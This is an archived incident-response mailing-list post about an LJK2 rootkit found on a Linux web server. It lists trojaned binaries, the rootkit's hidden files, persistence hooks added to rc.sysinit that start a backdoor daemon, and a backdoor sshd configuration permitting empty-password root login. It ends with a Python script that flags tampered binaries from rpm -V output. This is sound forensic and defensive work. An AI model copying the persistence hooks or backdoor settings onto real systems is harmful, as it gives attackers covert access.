Security Incidents mailing list archives
LJK2 rootkit?
From: fs () ONE-2-ONE NET (Felix Schueren)
Date: Tue, 16 May 2000 13:55:01 -0100
A webserver's DNS service stopped working "overnight", and when I checked it out first thing in the morning, trying to run "top" dumped me to a somewhat broken (no visible chars at all) shell. Curious, I checked the procps RPM checksum from a CD vs. the installed one, and it turned out to be different. I then checked all the RPMs vs. the original versions from CD:

S.5..UG.   /bin/ls
S.5..UG.   /usr/bin/locate
S.5....T c /etc/rc.d/rc.sysinit
S.5..UG.   /sbin/syslogd
S.5..UG.   /bin/netstat
S.5..UG.   /sbin/ifconfig
S.5..UG.   /bin/ps
SM5..UG.   /usr/bin/top
SM5..UG.   /usr/bin/pstree
SM5..UG.   /bin/login
.M......   /usr/bin/makemap

/* failure codes:
   5 - MD5 sum
   S - File size
   L - Symlink
   T - Mtime
   D - Device
   U - User
   G - Group
   M - Mode (includes permissions and file type)
*/

The user/group that all of those files had was 532/532. A search for all files owned by UID 532 revealed:

++++++++++++++++++++++++++++++++++++++
 55185 134 -rwxr-xr-x 1 532 532 136491 Aug  6  1998 /bin/ls
 55186  30 -rwxr-xr-x 1 532 532  30628 Sep  3  1998 /bin/netstat
 55187  37 -r-xr-xr-x 1 532 532  36959 Oct  3  1998 /bin/ps
 55199  25 -r-sr-xr-x 1 532 532  24772 Oct 14  1998 /bin/login
 55183  20 -rwxr-xr-x 1 532 532  19700 Sep  3  1998 /sbin/ifconfig
 55201 255 -rwxr-xr-x 1 532 532 260476 Nov 16  1999 /sbin/syslogd
 55182  28 -rwxr-xr-x 1 532 532  27751 Jul 29  1998 /usr/bin/locate
 55203  56 -rwxr-xr-x 1 532 532  56794 Oct  3  1998 /usr/bin/top
 55188  32 -rwxr-xr-x 1 532 532  32177 Sep 11  1998 /usr/bin/pstree
 55178   1 -rw-r--r-- 1 532 532    131 May 14 21:07 /usr/lib/libmen.oo/.LJK2/hide/.RK1addr
 55180   1 -rw-r--r-- 1 532 532     77 May 14 20:47 /usr/lib/libmen.oo/.LJK2/hide/.RK1log
 55179   1 -rw-r--r-- 1 532 532     76 Apr 12 13:57 /usr/lib/libmen.oo/.LJK2/hide/.RK1dir
 55181   1 -rw-r--r-- 1 532 532     44 May 14 21:07 /usr/lib/libmen.oo/.LJK2/hide/.RK1proc
 55194   5 -rwxr-xr-x 1 532 532   4098 Sep 12  1999 /usr/lib/libmen.oo/.LJK2/hide/RK1phidemod.c
 55191   4 -rwxr-xr-x 1 532 532   3407 Feb 15 20:08 /usr/lib/libmen.oo/.LJK2/modules/RK1hidem.c
 55193  25 -rwxr-xr-x 1 532 532  24860 Mar  3 20:22 /usr/lib/libmen.oo/.LJK2/modules/RK1phide
 55195   2 -rwxr-xr-x 1 532 532   1345 Sep  9  1999 /usr/lib/libmen.oo/.LJK2/clean/RK1sauber
 55200   8 -rwxr-xr-x 1 532 532   7538 Mar  6 00:02 /usr/lib/libmen.oo/.LJK2/clean/RK1wted
 55196  10 -rwxr-xr-x 1 532 532   9361 Sep  9  1999 /usr/lib/libmen.oo/.LJK2/hack/RK1sniff
 55192   7 -rwxr-xr-x 1 532 532   6232 Sep  9  1999 /usr/lib/libmen.oo/.LJK2/hack/RK1parse
136797 568 -rwxr-xr-x 1 532 532 580696 Feb 18 23:24 /usr/lib/libmen.oo/.LJK2/sshconfig/RK1ssh
 55173   1 -rw-r--r-- 1 532 532    880 Feb 18 23:24 /usr/lib/libmen.oo/.LJK2/ssh_config
 55174   1 -rw-r--r-- 1 532 532    542 Feb 18 23:24 /usr/lib/libmen.oo/.LJK2/ssh_host_key
 55175   1 -rw-r--r-- 1 532 532    329 Mar  6 00:34 /usr/lib/libmen.oo/.LJK2/ssh_host_key.pub
 55176   1 -rwxr-xr-x 1 532 532    512 May 15 13:46 /usr/lib/libmen.oo/.LJK2/ssh_random_seed
 55177   1 -rw-r--r-- 1 532 532    723 Feb 18 23:24 /usr/lib/libmen.oo/.LJK2/sshd_config
144926  26 -rwxr-xr-x 1 532 532  26352 Mar  3 20:06 /usr/sbin/rhxclean
 55198 600 -rwxr-xr-x 1 532 532 613543 Feb 18 23:24 /usr/sbin/rpmrhup
++++++++++++++++++++++++++++++++++++++

When I checked the rc.sysinit file, the following two suspicious entries were to be found at the very end of the file:

+++++++++++++++
# There is a RPM database which,
# needs to be updated.
if [ -x /usr/sbin/rpmrhup ]; then
        /usr/sbin/rpmrhup -p 60569
fi

# Since there are lost procs,
# we must clean them up.
if [ -x /usr/sbin/rhxclean ]; then
        /usr/sbin/rhxclean
fi
+++++++++++++++

Noteworthy: the bad English. The misplaced comma is a "common" European error; it would fit in nicely with the notes further down.

Here's the complete listing of the .LJK2 directory structure (this is out of a backup tar, the UIDs are broken by now):

+++++++++++++++++++++++
[machine]# ls -la *
-rw-r--r--   1 root     root          880 Feb 18 21:24 ssh_config
-rw-r--r--   1 root     root          542 Feb 18 21:24 ssh_host_key
-rw-r--r--   1 root     root          329 Mar  5 22:34 ssh_host_key.pub
-rwxr-xr-x   1 root     root          512 May 15 10:46 ssh_random_seed*
-rw-r--r--   1 root     root          723 Feb 18 21:24 sshd_config

backdoor:
total 29
drwxr-xr-x   2 root     root         1024 May 16 07:53 ./
drwxr-xr-x   9 root     root         1024 May 16 07:53 ../
-rwxr-xr-x   1 root     root        26352 May 14 17:47 RK1bd*

backup:
total 250
drwxr-xr-x   2 root     root         1024 May 16 07:53 ./
drwxr-xr-x   9 root     root         1024 May 16 07:53 ../
-rwxr-xr-x   1 root     root        12972 Aug  6  1998 du*
-rwxr-xr-x   1 root     root        25596 Sep  2  1998 ifconfig*
-rw-r--r--   1 root     root         3442 May 14 17:46 inetd.conf
-rwxr-xr-x   1 root     root         7560 Jul 29  1998 locate*
-rws--x--x   1 root     root        15284 Oct 14  1998 login*
-rwxr-xr-x   1 root     root        29308 Aug  6  1998 ls*
-rwxr-xr-x   1 root     root        39168 Sep  2  1998 netstat*
-r-xr-xr-x   1 root     root        12708 Oct  3  1998 ps*
-r-xr-xr-x   1 root     root        10176 Sep 11  1998 pstree*
-rwxr-xr-x   1 root     root         7165 Oct 15  1998 rc.sysinit*
-rwxr-xr-x   1 root     root        24988 Nov 16  1999 syslogd*
-rwxr-xr-x   1 root     root        19640 Aug 22  1998 tcpd*
-r-xr-xr-x   1 root     root        30772 Oct  3  1998 top*

clean:
total 12
drwxr-xr-x   2 root     root         1024 May 16 07:53 ./
drwxr-xr-x   9 root     root         1024 May 16 07:53 ../
-rwxr-xr-x   1 root     root         1345 Sep  9  1999 RK1sauber*
-rwxr-xr-x   1 root     root         7538 Mar  5 22:02 RK1wted*

hack:
total 19
drwxr-xr-x   2 root     root         1024 May 16 07:53 ./
drwxr-xr-x   9 root     root         1024 May 16 07:53 ../
-rwxr-xr-x   1 root     root         6232 Sep  9  1999 RK1parse*
-rwxr-xr-x   1 root     root         9361 Sep  9  1999 RK1sniff*

hide:
total 11
drwxr-xr-x   2 root     root         1024 May 16 07:53 ./
drwxr-xr-x   9 root     root         1024 May 16 07:53 ../
-rw-r--r--   1 root     root          131 May 14 18:07 .RK1addr
-rw-r--r--   1 root     root           76 Apr 12 10:57 .RK1dir
-rw-r--r--   1 root     root           77 May 14 17:47 .RK1log
-rw-r--r--   1 root     root           44 May 14 18:07 .RK1proc
-rwxr-xr-x   1 root     root         4098 Sep 12  1999 RK1phidemod.c*

modules:
total 33
drwxr-xr-x   2 root     root         1024 May 16 07:53 ./
drwxr-xr-x   9 root     root         1024 May 16 07:53 ../
-rwxr-xr-x   1 root     root          336 Apr 12 11:02 README.modules*
-rwxr-xr-x   1 root     root         3407 Feb 15 18:08 RK1hidem.c*
-rwxr-xr-x   1 root     root        24860 Mar  3 18:22 RK1phide*

sshconfig:
total 574
drwxr-xr-x   2 root     root         1024 May 16 07:53 ./
drwxr-xr-x   9 root     root         1024 May 16 07:53 ../
-rwxr-xr-x   1 root     root       580696 Feb 18 21:24 RK1ssh*
+++++++++++++++++++++++

Worth pointing out: ./clean/RK1sauber could very well be a hint on the nationality of the attacker, or the point of origin of the package: "sauber" is German for "clean". Also: the backup of inetd.conf is the original version w/o telnet; the /etc/inetd.conf had telnet services enabled after the package ran.

A few files of interest:

[root@machine]# cat .LJK2/hide/.RK1addr
1 212.204
1 62.236
2 212.204
2 62.236
3 76335
4 76335
4 6667
4 5556
4 6666
4 6664
4 6668
3 60569
4 60569
2 213.48
2 210.225
3 4103

next file:

[root@machine]# cat .LJK2/hide/.RK1log
RK1
.LJK2
synscan
76335
212.204
195.114
62.236
204.29
rpmrhup
rhxclean
60569

next:

[root@machine]# cat .LJK2/hide/.RK1dir
libmen.oo
.LJK2
rc.sysinit
lockit25.tgz
lockit25.tar
lockit25.tar.gz
lockit

and:

[root@machine]# less .LJK2/hide/.RK1proc
2 synscan
3 RK1
2 rpmrhup
2 rhxclean
3 sshd

./LJK2/ssh_host_key contains the string "root () www bigwigauctions com"
./LJK2/ssh_host_key.pub contains the string "root@LJK2"

./LJK2/sshd_config is a standard sshd config file, contents:

++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# This is ssh server systemwide configuration file.

Port 22
ListenAddress 0.0.0.0
HostKey /usr/lib/libmen.oo/.LJK2/ssh_host_key
RandomSeed /usr/lib/libmen.oo/.LJK2/ssh_random_seed
ServerKeyBits 768
LoginGraceTime 600
KeyRegenerationInterval 3600
PermitRootLogin yes
IgnoreRhosts no
StrictModes yes
QuietMode no
X11Forwarding yes
X11DisplayOffset 10
FascistLogging no
PrintMotd yes
KeepAlive yes
SyslogFacility DAEMON
RhostsAuthentication no
RhostsRSAAuthentication yes
RSAAuthentication yes
PasswordAuthentication yes
PermitEmptyPasswords yes
UseLogin no
# CheckMail no
# PidFile /u/zappa/.ssh/pid
# AllowHosts *.our.com friend.other.com
# DenyHosts lowsecurity.theirs.com *.evil.org evil.org
# Umask 022
# SilentDeny yes
+++++++++++++++++++++++++++++++++++++++++++

This looks similar to (but not exactly like) the CERT advisory described in the summary http://www.cert.org/summaries/CS-98.04.html

The version of BIND running was bind-8.1.2-5 (yeah... I know...), and I got a couple of "lame server on..." messages and lots of named restarts around the time at which I place the intrusion.

Any ideas on whether or not it would be possible to retrieve the point of origin of the attack? Also, was this a known package? I haven't been able to find anything about "LJK2"...

Oh, and while the machine itself has been restored, I have a full backup available, so if you have any further questions about files etc. I'll be glad to dig them out.

regards,
felix

--
------------------------------------------------------------
Felix Schüren, fs () one-2-one net, Technik
ONE-2-ONE Advertising + Telecommunications GmbH
Theodor-Heuss-Str. 92-100, 51149 Koeln, Germany
Telefon (01805) 6632-66  Telefax (01805) 6632-33
info () one-2-one net  http://www.one-2-one.net
Geschaeftsfuehrer: Mike Behrendt, HRB 28495 Koeln
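The triage step Felix describes (comparing installed binaries against the RPM database and reading the `rpm -V` failure codes) is easy to automate. The following is an added example and not code from the post: it parses `rpm -V`-style verification lines (the sample input is constructed from the lines quoted above, plus one made-up `missing` line to cover that output form) and buckets them by the pattern the post shows, namely binaries whose size and MD5 changed together with their user and group. The flag-to-attribute mapping is the one documented in rpm(8); everything else (function names, the bucket names, the `TROJAN_ATTRS` heuristic) is this example's own choice.

```python
"""Parse `rpm -V` / `rpm -Va` output and bucket the results for incident triage.

Added example, not part of the original post. Assumes the standard rpm(8)
verify line format: 8 (or, on newer rpm, 9) attribute flag characters, an
optional file-type marker (c/d/g/l/r), and the path; unverifiable files are
reported as "missing <path>".
"""
import re
from collections import defaultdict

# rpm(8) verify flags, in column order. '.' means the attribute passed,
# '?' means it could not be checked (both are ignored below).
FLAG_NAMES = {
    "S": "size",
    "M": "mode",
    "5": "md5",
    "D": "device",
    "L": "symlink",
    "U": "user",
    "G": "group",
    "T": "mtime",
    "P": "capabilities",  # 9th column on newer rpm versions only
}

# Constructed sample: the rpm -V lines quoted in the post, plus one made-up
# "missing" line so that output form is exercised too.
SAMPLE_OUTPUT = """\
S.5..UG.   /bin/ls
S.5..UG.   /usr/bin/locate
S.5....T c /etc/rc.d/rc.sysinit
S.5..UG.   /sbin/syslogd
S.5..UG.   /bin/netstat
S.5..UG.   /sbin/ifconfig
S.5..UG.   /bin/ps
SM5..UG.   /usr/bin/top
SM5..UG.   /usr/bin/pstree
SM5..UG.   /bin/login
.M......   /usr/bin/makemap
missing    /usr/share/doc/example/README
"""

VERIFY_RE = re.compile(
    r"^(?P<flags>[SM5DLUGTP.?]{8,9})\s+(?:(?P<type>[cdglr])\s+)?(?P<path>/.*)$"
)
MISSING_RE = re.compile(r"^missing\s+(?:(?P<type>[cdglr])\s+)?(?P<path>/.*)$")

# Heuristic for a replaced ("trojaned") binary, taken from the post's own data:
# the content changed (size and MD5) *and* the owner/group changed.
TROJAN_ATTRS = {"size", "md5", "user", "group"}


def parse_verify_line(line):
    """Return (path, file_type_marker_or_None, set_of_failed_attributes).

    A 'missing' line yields the pseudo-attribute {"missing"}.
    Raises ValueError on a line that is not rpm -V output.
    """
    line = line.rstrip("\n")
    m = MISSING_RE.match(line)
    if m:
        return m.group("path"), m.group("type"), {"missing"}
    m = VERIFY_RE.match(line)
    if not m:
        raise ValueError("unrecognised rpm -V line: %r" % line)
    failed = {FLAG_NAMES[c] for c in m.group("flags") if c in FLAG_NAMES}
    return m.group("path"), m.group("type"), failed


def parse_verify_output(text):
    """Parse a whole rpm -V(a) report, skipping blank lines."""
    return [parse_verify_line(l) for l in text.splitlines() if l.strip()]


def classify(entries):
    """Bucket parsed entries: trojaned_binary, config_changed, missing, other.

    Order within each bucket follows the input order, so the result is
    suitable for a written-up timeline.
    """
    buckets = defaultdict(list)
    for path, ftype, failed in entries:
        if "missing" in failed:
            buckets["missing"].append(path)
        elif TROJAN_ATTRS <= failed:
            buckets["trojaned_binary"].append(path)
        elif ftype == "c":
            # A config file (%config in the spec) that differs from the package
            # is normal; it still needs a manual diff, as rc.sysinit shows.
            buckets["config_changed"].append(path)
        else:
            buckets["other"].append(path)
    return dict(buckets)


if __name__ == "__main__":
    for bucket, paths in sorted(classify(parse_verify_output(SAMPLE_OUTPUT)).items()):
        print("%-16s %s" % (bucket, " ".join(paths)))
```

Two caveats a responder should keep in mind when using this. First, `rpm -V` trusts both the local `rpm` binary and the RPM database on the compromised disk; the attacker here named their backdoor `rpmrhup`, which shows how plausible tampering with the RPM tooling is, so the comparison is only meaningful when run with a known-good `rpm` and package files from read-only media, which is effectively what comparing against the CD achieves. Second, a `.M......` result on its own (here `/usr/bin/makemap`) usually means a mode change rather than a replaced file and lands in `other`; it deserves a look but is not the same signal as the size/MD5/owner triplet.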